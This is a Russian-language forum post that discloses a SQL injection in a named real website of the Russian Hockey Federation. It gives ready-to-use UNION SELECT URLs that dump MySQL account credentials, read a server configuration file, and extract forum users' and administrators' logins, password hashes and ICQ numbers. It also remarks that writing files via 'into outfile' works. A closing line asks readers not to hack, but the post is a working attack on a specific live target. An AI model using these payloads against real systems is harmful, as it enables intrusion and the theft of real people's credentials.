Предлагаю Вашему вниманию очень пикантную скулю
. Федерация хоккея России. PHP-скрипт имеет права рута доступа к мускулу, поэтому можно творить очень многое, а именно:
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(user,':',password)+from+mysql.user/*
Хотя есть и более простой способ увести пароль от MySQL - через конфиг phpbb
(Смотреть "исходники" страницы)
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,load_file('/home/www/htdocs/www/conf/config.php')/*
А вот и юзвери форума:
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(username,':',user_password,':',user_icq)+from+home.phpbb_users+limit+1/*
Ну и конечно, админы, там их докуя фроде
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(login,'%20:%20',password,'%20:%20',comment)+from+online_feb.fhr_admins+limit+0,1/*
Также отлично работает into outfile.
P.S. Пожалуйста, не хакайте, только ознакамливаемся.